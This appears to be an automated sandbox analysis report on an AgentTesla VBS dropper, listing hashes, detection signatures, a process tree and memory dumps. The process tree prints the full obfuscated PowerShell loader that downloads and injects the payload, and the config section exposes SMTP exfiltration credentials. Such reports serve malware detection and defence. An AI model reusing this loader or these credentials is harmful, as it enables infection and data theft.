Analysis

  • max time kernel
    155s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-03-2024 02:04

General

  • Target

    1d904923afd1492b273adde94f1f53bb7f013fc66dda235714fe579316efa556.vbs

  • Size

    22KB

  • MD5

    bbf3e640e78ef04169cea2d4fdc8b99a

  • SHA1

    0b989fe0ec4d245967375891f401e6eaad551a23

  • SHA256

    1d904923afd1492b273adde94f1f53bb7f013fc66dda235714fe579316efa556

  • SHA512

    bed6cd983b87a20816ed12b5968fb30590f9907cda5ff9e9d8a17ba65fe9254a9203dcce6d172ce62bb2b44e6d75769535cc955e4df29875f583eacfd4e876d4

  • SSDEEP

    384:KScT5cOUi2ZnbxPatJfRRI/DozpsMfdOpNLQ/JD31z3jVOcmjrKWALvW:KSc1fUZZnb5aHRRILod0NLQ/JD13jQh1

Malware Config

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    smtp.ionos.es
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    ReparaHogar2013

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs
  • Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1d904923afd1492b273adde94f1f53bb7f013fc66dda235714fe579316efa556.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2496
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kardinalsystemerne Afslagning Knitwears #>;$Perfector=(cmd /c set /A 115^^0);Function Tetrapartite ([String]$Disrepair){$Perfector=[char][int]$Perfector;$Restaurationsklausulerne=$Perfector+'ubstring';$Shivaist=8;$Biplaneterne=Avlingen($Disrepair);For($Fylderistens=7; $Fylderistens -lt $Biplaneterne; $Fylderistens+=$Shivaist){$Cullisance=$Disrepair.$Restaurationsklausulerne.Invoke($Fylderistens, 1);$Ramninger181=$Ramninger181+$Cullisance;}$Ramninger181;}function Salamier ($Manipulative){& ($Filmcensurers) ($Manipulative);}function Avlingen ([String]$Barwal){$Putid=$Barwal.Length-1;$Putid;}$Borup=Tetrapartite 'IngeminTWatchinrNoden.ua SrhftenQuadratsEksportf SprngheKollektrFoppishrJ gerepiPers.cunS indtpgApholat ';$Eponymism=Tetrapartite ',undsavhSkol pltStnkelatPrecultpsvend.bsSpectro:Melonec/El,tedn/ Coercid NonopirYng,temi.diocravTagvrkeeCat nat.Headsmag .nerpeoDehydreoFre,hangfacetsllJoomshaeAlderwo.Duramencatonedbo Likvidmmarinea/ArbejdeuIn.oingc Vagtpo?Tilbageechal.zaxp umptspCoop,ato RvestorSulfon.tUan.eli=Indl,dtdSkihejsoDekomprwStad.dynUninebrl Bry.seo Brystna UnaltedDatamat&.esectiiPhilan.d Wedbe,=Borat b1OvervurAThinkin1ChalutzTIndgivnSConcoctskalotteMBrne sy6dr tsthFOverpreMUnpen iONonrepofOpslmme4UdfldenyUnjelleABifidlyAManu skU iavermyUdrulnivBlytkkeMindbankcUeffengw Bima,ofhjlpeteK ForfrihTurbinalEfrenaf8Bruye,erFornuftLRvekageNImpoverc GaleniehypoamiaHenregn ';$Filmcensurers=Tetrapartite 'Klejn riNazipare CembalxErhverv ';$Equilaterals=Tetrapartite 'Mosasau$Moretlag keandlGardi.poGasbaghbBlanketa Adiathl Comana:BhootunCMedholdoOversparTestudon Gro,see S.mfuniopmaerkt DegageiEivinsrs Ledsag Reattac=Semipen BombardSSammenktfka.ieoa BehenarBndellatSagsomk-GrsningBEducatei Ser.sftHild rssOperatiTPost.orrSerialia GlamounGjal,resReplanufSladdereTrk.ardrLieusti Arfved-AnnunciSHogtieioStrob suSpuleslrSaba onc S.ddleeMonophy Klbning$SammenbE CaselepEnematao S,vatmnPenucheyMinorismSinn.ngi ndelsbsverdensmstanche Bgespi-untactfDDisc.ideLivmod,s ristet Pemo,ii OverganOgdannaaWarwicktMete,vaiHus.ando.ixtybinSu,erla Greav,f$ osaikPHands,eoNooserspGaspedakArmbevgoInductsmNonrecipBlakketoMasselanBarograiUnsneakss udinet Lemlst ';Salamier (Tetrapartite 'Redescr$DriverlgStortrjlUndisowoRodtegnbP,ismrkafdestedlSkalles: enboenPRenskrioKommentpKategorkRub gosoMet ylomHovedstp Ansi.to ComatonNervekri RedaktsAtomubatMyri,gr=cosesre$RekommaeLipoidsn Infrigv,bxesre:Minde.sajerimiap Wisc npPrfabridParadokaMatrimotFarsereaObserva ') ;Salamier (Tetrapartite 'Mac andIRelaxedm Ent mbpForindsoS.rvicerTheorettEvadatt-Elv,ksaMByggelaoScariold,ekreeru MedborlSystemdePallado EntinctBHyperliiLovovertF dskifsPolyphaTKild.prrYd rvggaRisfuglnprostylsNationafCompla.eAfbudsrrToksine ') ;$Popkomponist=$Popkomponist+'\Togas.Sen' ;Salamier (Tetrapartite '.entyne$Unobeseg Tils alOrlogskoSkraanebCavoursa,egregalBnkerkk:Bal aniP StjaalhSta,funyEfterfosElefantaStjer,e=.olyval(BestillTKeroliteTurntabsbolig.itLamp.et- Fu.orsPLevemu.aTor illt.ewiggehFenrisf Interbl$AsexualPAgterdeo AugustpKkkengrkSvrtbevo Brush.mMidsommp Ventrio BisammnLampistiLenticos Grfabrt Amo al)Daemilj ') ;while (-not $Physa) {Salamier (Tetrapartite 'SoldaneITodusarfSolsort Forha.n(Ramp,ne$trich nCProcincoUnresper Asperin LiteraeTal.erkiStrikketBaa plaiEpicotysPredepl.Irr.denJGavntrho Agte,hboverbitSunres et Managea Bil,edtCuartineBegrnse Korvet-BasineteIdeologqVrdired Karlsen$Andels,BSludde o Sc.phorP,yinggu HonourpNeurolo)Crackne distru{SkamlbeSFaglrertGu,depoaBespre,rKrisefotride an-FaderesSMngdepalUnderriekkkenpee BestigpUnmono Placksu1Tasteru}PaucifyeQuatreflDiscomfsOptimale Us,ige{ParangiS AnodyntBr ttofaFrdigbyr EgresstS,inkdy-Br.esmoSplag arlSa.onifeTaphulsetonga.spgnotobi Xantho1Cosgrov;BlosterSPizz,caa KorisklMacrocoaTemperamStorma,iDepresseBarba,arPr toso Fibr.p$AgtbasiENoncorpq AktiviuDosmerniMendelel,onbitiaBrugerpt.jippedeEquipedrBerrugaa Untze l Ca ablsUbegave}T.lmate ');Salamier (Tetrapartite 'Ufor,le$OrthoepgSickeril ForsvaoArtierhbValgba.askarnsul sammen:NonvoidPScolopehLymphogyHistamisTmrerb aElsdyrh=U shrew(HoosgowTCranfulebut,erfs LrvilltCoplotk-KonsekvPPorcellaAfhngigtAmtsborh emissi Extermi$GypsousPudst rioStimlenpMunchiekGlaciolo StvninmPneumaspHommackoDawtsunnundotteiComfortsBrokkettStenfru)Galopba ') ;}Salamier (Tetrapartite 'Supersp$Spect.egVelf rtlLigateso Severib udskilaSrnumrelfoe.ens:,remmesRBermudaeSpasm thEks anseMiscognbReprse oUaccepttAtok.ldhHematom Hak eor=Deerwoo AntisiGGateposeShi.tintFragten-S.utskeC MinimioOverphinPo yesttDe,ickbeunzippinInsertstTa keba Medbe l$AnlgsfoPTelolecoMetermapoccurrikFortrnco CrosslmMi,bestpMtstatooRiftingnbrudenei.dificesDe.ospht For,or ');Salamier (Tetrapartite 'In,lejr$Anticatg PorticlCoakmoroClivussb AlbumiaImbibealZinckin:WaxflowHUnclutcy Di.zotbNonfactrFetterli tebirkd.uanepai hegnstsRuboutseNirlsu.dUndi,co7,penhea Flagell=Afmagne catefin[TriphenS AntydeyTitu ersVanningtTilvaereTube.kumHept te.,implexCSecuricoUnagingnGuaraunv Iag.taeKiasmesr UdradetDishuma] To,eho:Crossha:TontineFAttendirF.ekvenoElide.em,orrektBCajsunmadokumensUnthroneNyprisa6Oenanth4TonikasSSkrivertLabyrinrIronhaniSprink.nInds rigUnquitt( Lymphe$JinglinRIndkogse UngdomhSpi elieDia onabUnloos o jovinitAnliggehRedskab)E tente ');Salamier (Tetrapartite 'Opga.es$TastefugAutochtlIng uviot inedeb yskildaHyalophlPristal:DampersV Saale e LeksikjZingibee Ge.nemnBra.sche Gataab Sa oli=Hjernek Guldmn[ SuperbS Bi,manyrut,bacs DrogettPizza,seUlejligmWagnc,r.UnincreTDiametre GrundtxReindextAfferen.LerholdEKontoringasbordc Bitterobedrvesd WindfaiEmitternVerfwrigbaubles]Beretti: Film o:MestervAUl,racrSDatab,hCUnrestrIBocciasIUncapev.TiaarsdGAk,ivmae DitetitParimutSFutur,stCor.zosrAnticipiTilordnnPyr midgDi trou(Drum ea$FooldomH snurpeyCanadiebEnkeltsr ecopteiLuerautdT appisiStealthsM.lesheeBohemiad .adder7Delsind) Deport ');Salamier (Tetrapartite 'Afstden$BalmhuggDrea,scl Re.pito KettlebOverruna BukketlStangei:kelepdifPersonlaNtternemNykalk.i S,artklVirksomiFntrrinaGladiolr UkvemsiUansvartsignposeUndrunktUdviklieWeek,innToeveem=Fusenta$Moonsh VLau,cheeChunkinjK nkurse.imbulvnTr kimpeSpanier.modstilsElectrouTownswob,lindissUnbec.mtExograprOverturiGennemtnApprobegC.habit(Solduge3Srgelig0Stt kas5Similar8 S rnin7 Tr.lle9Afvbned,Surhed.3Ludo,ph0Lyssy,n6 Aniesr2 Forlov8Lediges) Guddom ');Salamier $familiariteten;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2840
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:1096
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Kardinalsystemerne Afslagning Knitwears #>;$Perfector=(cmd /c set /A 115^^0);Function Tetrapartite ([String]$Disrepair){$Perfector=[char][int]$Perfector;$Restaurationsklausulerne=$Perfector+'ubstring';$Shivaist=8;$Biplaneterne=Avlingen($Disrepair);For($Fylderistens=7; $Fylderistens -lt $Biplaneterne; $Fylderistens+=$Shivaist){$Cullisance=$Disrepair.$Restaurationsklausulerne.Invoke($Fylderistens, 1);$Ramninger181=$Ramninger181+$Cullisance;}$Ramninger181;}function Salamier ($Manipulative){& ($Filmcensurers) ($Manipulative);}function Avlingen ([String]$Barwal){$Putid=$Barwal.Length-1;$Putid;}$Borup=Tetrapartite 'IngeminTWatchinrNoden.ua SrhftenQuadratsEksportf SprngheKollektrFoppishrJ gerepiPers.cunS indtpgApholat ';$Eponymism=Tetrapartite ',undsavhSkol pltStnkelatPrecultpsvend.bsSpectro:Melonec/El,tedn/ Coercid NonopirYng,temi.diocravTagvrkeeCat nat.Headsmag .nerpeoDehydreoFre,hangfacetsllJoomshaeAlderwo.Duramencatonedbo Likvidmmarinea/ArbejdeuIn.oingc Vagtpo?Tilbageechal.zaxp umptspCoop,ato RvestorSulfon.tUan.eli=Indl,dtdSkihejsoDekomprwStad.dynUninebrl Bry.seo Brystna UnaltedDatamat&.esectiiPhilan.d Wedbe,=Borat b1OvervurAThinkin1ChalutzTIndgivnSConcoctskalotteMBrne sy6dr tsthFOverpreMUnpen iONonrepofOpslmme4UdfldenyUnjelleABifidlyAManu skU iavermyUdrulnivBlytkkeMindbankcUeffengw Bima,ofhjlpeteK ForfrihTurbinalEfrenaf8Bruye,erFornuftLRvekageNImpoverc GaleniehypoamiaHenregn ';$Filmcensurers=Tetrapartite 'Klejn riNazipare CembalxErhverv ';$Equilaterals=Tetrapartite 'Mosasau$Moretlag keandlGardi.poGasbaghbBlanketa Adiathl Comana:BhootunCMedholdoOversparTestudon Gro,see S.mfuniopmaerkt DegageiEivinsrs Ledsag Reattac=Semipen BombardSSammenktfka.ieoa BehenarBndellatSagsomk-GrsningBEducatei Ser.sftHild rssOperatiTPost.orrSerialia GlamounGjal,resReplanufSladdereTrk.ardrLieusti Arfved-AnnunciSHogtieioStrob suSpuleslrSaba onc S.ddleeMonophy Klbning$SammenbE CaselepEnematao S,vatmnPenucheyMinorismSinn.ngi ndelsbsverdensmstanche Bgespi-untactfDDisc.ideLivmod,s ristet Pemo,ii OverganOgdannaaWarwicktMete,vaiHus.ando.ixtybinSu,erla Greav,f$ osaikPHands,eoNooserspGaspedakArmbevgoInductsmNonrecipBlakketoMasselanBarograiUnsneakss udinet Lemlst ';Salamier (Tetrapartite 'Redescr$DriverlgStortrjlUndisowoRodtegnbP,ismrkafdestedlSkalles: enboenPRenskrioKommentpKategorkRub gosoMet ylomHovedstp Ansi.to ComatonNervekri RedaktsAtomubatMyri,gr=cosesre$RekommaeLipoidsn Infrigv,bxesre:Minde.sajerimiap Wisc npPrfabridParadokaMatrimotFarsereaObserva ') ;Salamier (Tetrapartite 'Mac andIRelaxedm Ent mbpForindsoS.rvicerTheorettEvadatt-Elv,ksaMByggelaoScariold,ekreeru MedborlSystemdePallado EntinctBHyperliiLovovertF dskifsPolyphaTKild.prrYd rvggaRisfuglnprostylsNationafCompla.eAfbudsrrToksine ') ;$Popkomponist=$Popkomponist+'\Togas.Sen' ;Salamier (Tetrapartite '.entyne$Unobeseg Tils alOrlogskoSkraanebCavoursa,egregalBnkerkk:Bal aniP StjaalhSta,funyEfterfosElefantaStjer,e=.olyval(BestillTKeroliteTurntabsbolig.itLamp.et- Fu.orsPLevemu.aTor illt.ewiggehFenrisf Interbl$AsexualPAgterdeo AugustpKkkengrkSvrtbevo Brush.mMidsommp Ventrio BisammnLampistiLenticos Grfabrt Amo al)Daemilj ') ;while (-not $Physa) {Salamier (Tetrapartite 'SoldaneITodusarfSolsort Forha.n(Ramp,ne$trich nCProcincoUnresper Asperin LiteraeTal.erkiStrikketBaa plaiEpicotysPredepl.Irr.denJGavntrho Agte,hboverbitSunres et Managea Bil,edtCuartineBegrnse Korvet-BasineteIdeologqVrdired Karlsen$Andels,BSludde o Sc.phorP,yinggu HonourpNeurolo)Crackne distru{SkamlbeSFaglrertGu,depoaBespre,rKrisefotride an-FaderesSMngdepalUnderriekkkenpee BestigpUnmono Placksu1Tasteru}PaucifyeQuatreflDiscomfsOptimale Us,ige{ParangiS AnodyntBr ttofaFrdigbyr EgresstS,inkdy-Br.esmoSplag arlSa.onifeTaphulsetonga.spgnotobi Xantho1Cosgrov;BlosterSPizz,caa KorisklMacrocoaTemperamStorma,iDepresseBarba,arPr toso Fibr.p$AgtbasiENoncorpq AktiviuDosmerniMendelel,onbitiaBrugerpt.jippedeEquipedrBerrugaa Untze l Ca ablsUbegave}T.lmate ');Salamier (Tetrapartite 'Ufor,le$OrthoepgSickeril ForsvaoArtierhbValgba.askarnsul sammen:NonvoidPScolopehLymphogyHistamisTmrerb aElsdyrh=U shrew(HoosgowTCranfulebut,erfs LrvilltCoplotk-KonsekvPPorcellaAfhngigtAmtsborh emissi Extermi$GypsousPudst rioStimlenpMunchiekGlaciolo StvninmPneumaspHommackoDawtsunnundotteiComfortsBrokkettStenfru)Galopba ') ;}Salamier (Tetrapartite 'Supersp$Spect.egVelf rtlLigateso Severib udskilaSrnumrelfoe.ens:,remmesRBermudaeSpasm thEks anseMiscognbReprse oUaccepttAtok.ldhHematom Hak eor=Deerwoo AntisiGGateposeShi.tintFragten-S.utskeC MinimioOverphinPo yesttDe,ickbeunzippinInsertstTa keba Medbe l$AnlgsfoPTelolecoMetermapoccurrikFortrnco CrosslmMi,bestpMtstatooRiftingnbrudenei.dificesDe.ospht For,or ');Salamier (Tetrapartite 'In,lejr$Anticatg PorticlCoakmoroClivussb AlbumiaImbibealZinckin:WaxflowHUnclutcy Di.zotbNonfactrFetterli tebirkd.uanepai hegnstsRuboutseNirlsu.dUndi,co7,penhea Flagell=Afmagne catefin[TriphenS AntydeyTitu ersVanningtTilvaereTube.kumHept te.,implexCSecuricoUnagingnGuaraunv Iag.taeKiasmesr UdradetDishuma] To,eho:Crossha:TontineFAttendirF.ekvenoElide.em,orrektBCajsunmadokumensUnthroneNyprisa6Oenanth4TonikasSSkrivertLabyrinrIronhaniSprink.nInds rigUnquitt( Lymphe$JinglinRIndkogse UngdomhSpi elieDia onabUnloos o jovinitAnliggehRedskab)E tente ');Salamier (Tetrapartite 'Opga.es$TastefugAutochtlIng uviot inedeb yskildaHyalophlPristal:DampersV Saale e LeksikjZingibee Ge.nemnBra.sche Gataab Sa oli=Hjernek Guldmn[ SuperbS Bi,manyrut,bacs DrogettPizza,seUlejligmWagnc,r.UnincreTDiametre GrundtxReindextAfferen.LerholdEKontoringasbordc Bitterobedrvesd WindfaiEmitternVerfwrigbaubles]Beretti: Film o:MestervAUl,racrSDatab,hCUnrestrIBocciasIUncapev.TiaarsdGAk,ivmae DitetitParimutSFutur,stCor.zosrAnticipiTilordnnPyr midgDi trou(Drum ea$FooldomH snurpeyCanadiebEnkeltsr ecopteiLuerautdT appisiStealthsM.lesheeBohemiad .adder7Delsind) Deport ');Salamier (Tetrapartite 'Afstden$BalmhuggDrea,scl Re.pito KettlebOverruna BukketlStangei:kelepdifPersonlaNtternemNykalk.i S,artklVirksomiFntrrinaGladiolr UkvemsiUansvartsignposeUndrunktUdviklieWeek,innToeveem=Fusenta$Moonsh VLau,cheeChunkinjK nkurse.imbulvnTr kimpeSpanier.modstilsElectrouTownswob,lindissUnbec.mtExograprOverturiGennemtnApprobegC.habit(Solduge3Srgelig0Stt kas5Similar8 S rnin7 Tr.lle9Afvbned,Surhed.3Ludo,ph0Lyssy,n6 Aniesr2 Forlov8Lediges) Guddom ');Salamier $familiariteten;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1092
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c set /A 115^^0
            4⤵
              PID:3512
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3944
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3932 --field-trial-handle=2304,i,6987730730348465820,3913273227385401271,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:2596

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5zvifgro.wpu.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/1092-43-0x0000000007530000-0x0000000007BAA000-memory.dmp

          Filesize

          6.5MB

        • memory/1092-39-0x00000000049D0000-0x00000000049E0000-memory.dmp

          Filesize

          64KB

        • memory/1092-45-0x0000000006EB0000-0x0000000006F46000-memory.dmp

          Filesize

          600KB

        • memory/1092-56-0x0000000077BC1000-0x0000000077CE1000-memory.dmp

          Filesize

          1.1MB

        • memory/1092-55-0x00000000049D0000-0x00000000049E0000-memory.dmp

          Filesize

          64KB

        • memory/1092-54-0x00000000049D0000-0x00000000049E0000-memory.dmp

          Filesize

          64KB

        • memory/1092-53-0x0000000008160000-0x000000000D70E000-memory.dmp

          Filesize

          85.7MB

        • memory/1092-20-0x00000000751A0000-0x0000000075950000-memory.dmp

          Filesize

          7.7MB

        • memory/1092-21-0x00000000049D0000-0x00000000049E0000-memory.dmp

          Filesize

          64KB

        • memory/1092-22-0x0000000002340000-0x0000000002376000-memory.dmp

          Filesize

          216KB

        • memory/1092-23-0x00000000049D0000-0x00000000049E0000-memory.dmp

          Filesize

          64KB

        • memory/1092-24-0x0000000005010000-0x0000000005638000-memory.dmp

          Filesize

          6.2MB

        • memory/1092-25-0x00000000049E0000-0x0000000004A02000-memory.dmp

          Filesize

          136KB

        • memory/1092-26-0x0000000004E00000-0x0000000004E66000-memory.dmp

          Filesize

          408KB

        • memory/1092-27-0x0000000004EE0000-0x0000000004F46000-memory.dmp

          Filesize

          408KB

        • memory/1092-33-0x0000000005640000-0x0000000005994000-memory.dmp

          Filesize

          3.3MB

        • memory/1092-44-0x0000000006220000-0x000000000623A000-memory.dmp

          Filesize

          104KB

        • memory/1092-73-0x00000000751A0000-0x0000000075950000-memory.dmp

          Filesize

          7.7MB

        • memory/1092-40-0x0000000005C40000-0x0000000005C5E000-memory.dmp

          Filesize

          120KB

        • memory/1092-41-0x0000000005D40000-0x0000000005D8C000-memory.dmp

          Filesize

          304KB

        • memory/1092-42-0x00000000049D0000-0x00000000049E0000-memory.dmp

          Filesize

          64KB

        • memory/1092-52-0x00000000073F0000-0x00000000073F1000-memory.dmp

          Filesize

          4KB

        • memory/1092-46-0x00000000062B0000-0x00000000062D2000-memory.dmp

          Filesize

          136KB

        • memory/1092-50-0x00000000049D0000-0x00000000049E0000-memory.dmp

          Filesize

          64KB

        • memory/1092-38-0x00000000751A0000-0x0000000075950000-memory.dmp

          Filesize

          7.7MB

        • memory/1092-47-0x0000000007BB0000-0x0000000008154000-memory.dmp

          Filesize

          5.6MB

        • memory/1092-48-0x00000000070D0000-0x00000000070F2000-memory.dmp

          Filesize

          136KB

        • memory/1092-49-0x0000000007140000-0x0000000007154000-memory.dmp

          Filesize

          80KB

        • memory/2840-14-0x00007FFC3C870000-0x00007FFC3D331000-memory.dmp

          Filesize

          10.8MB

        • memory/2840-4-0x0000027635480000-0x00000276354A2000-memory.dmp

          Filesize

          136KB

        • memory/2840-19-0x00007FFC3C870000-0x00007FFC3D331000-memory.dmp

          Filesize

          10.8MB

        • memory/2840-18-0x000002764FED0000-0x000002764FEE4000-memory.dmp

          Filesize

          80KB

        • memory/2840-17-0x000002764FE80000-0x000002764FEA6000-memory.dmp

          Filesize

          152KB

        • memory/2840-16-0x00000276354B0000-0x00000276354C0000-memory.dmp

          Filesize

          64KB

        • memory/2840-15-0x00000276354B0000-0x00000276354C0000-memory.dmp

          Filesize

          64KB

        • memory/2840-79-0x00007FFC3C870000-0x00007FFC3D331000-memory.dmp

          Filesize

          10.8MB

        • memory/3944-83-0x00000000264C0000-0x0000000026552000-memory.dmp

          Filesize

          584KB

        • memory/3944-71-0x0000000001030000-0x0000000002284000-memory.dmp

          Filesize

          18.3MB

        • memory/3944-74-0x0000000001030000-0x0000000001072000-memory.dmp

          Filesize

          264KB

        • memory/3944-75-0x00000000751A0000-0x0000000075950000-memory.dmp

          Filesize

          7.7MB

        • memory/3944-76-0x0000000023780000-0x0000000023790000-memory.dmp

          Filesize

          64KB

        • memory/3944-58-0x0000000077BC1000-0x0000000077CE1000-memory.dmp

          Filesize

          1.1MB

        • memory/3944-80-0x0000000025D20000-0x0000000025D70000-memory.dmp

          Filesize

          320KB

        • memory/3944-81-0x0000000026420000-0x00000000264BC000-memory.dmp

          Filesize

          624KB

        • memory/3944-57-0x0000000077C48000-0x0000000077C49000-memory.dmp

          Filesize

          4KB

        • memory/3944-84-0x0000000025DF0000-0x0000000025DFA000-memory.dmp

          Filesize

          40KB